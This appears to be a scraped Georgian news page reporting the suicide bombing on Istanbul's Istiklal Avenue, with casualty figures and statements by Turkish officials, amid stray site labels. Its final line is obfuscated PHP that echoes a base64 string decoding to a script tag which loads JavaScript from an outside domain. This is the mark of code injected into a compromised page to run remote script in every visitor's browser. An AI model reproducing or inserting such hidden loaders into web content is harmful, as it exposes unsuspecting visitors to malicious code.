celsiusi
ავერსი საქკაბელი
სტამბოლში, ისტიკლალის გამზირზე თავი თვითმკვლელმა ქალმა აიფეთქა - ამის შესახებ თურქეთის ვიცე-პრეზიდენტი ფუათ ოქტაი საუბრობს. ამბობს იმასაც, რომ მასთან ერთად ტერაქტში კიდევ ორი კაცი მონაწილეობდა. 
 
მანამდე კი ცნობილი გახდა, რომ ტერაქტის გამოსაძიებლად 10-კაციანი საგამოძიებო ჯგუფი შეიქმნა.
 
ამ დროისთვის, ცნობილია, რომ აფეთქებისას დაშავებულთა რიცხვი 60-ს აღემატება, დაიღუპა - 6, რომელთაგან 4 ადგილზე, 2 კი საავადმყოფოში გარდაიცვალა. 
 
მანამდე კი, პრეზიდენტმა ერდოღანმა განაცხადა, რომ სტამბოლში მომხდარი აფეთქება, შესაძლოა, ტერორისტულ აქტს უკავშირდებოდეს და "არის ნიშნები, რომ ტერაქტის საქმეში ქალიც ფიგურირებს".
290
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");